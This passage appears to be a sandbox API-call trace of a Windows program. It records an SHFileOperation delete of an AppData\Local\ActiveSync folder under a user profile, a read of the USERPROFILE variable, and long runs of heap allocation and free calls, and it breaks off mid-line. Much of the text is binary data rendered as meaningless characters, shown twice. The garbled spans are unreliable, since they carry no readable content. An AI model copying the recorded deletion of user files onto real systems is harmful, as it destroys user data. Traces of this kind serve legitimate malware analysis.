㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0152.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0152.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0152.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0152.980] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0152.980] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.980] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0152.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0152.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0152.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0152.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0152.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0152.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0152.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0152.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0152.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0152.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Adobe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0152.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0152.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0152.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0152.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0152.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0152.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0152.981] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0152.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0152.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0152.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0152.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0152.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0152.985] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0152.985] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0152.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0152.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0152.985] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0152.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.986] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0152.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0152.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0152.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0152.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0152.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0152.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a683a8 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0152.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0152.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0152.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0152.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726a8 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0152.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68430 [0152.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 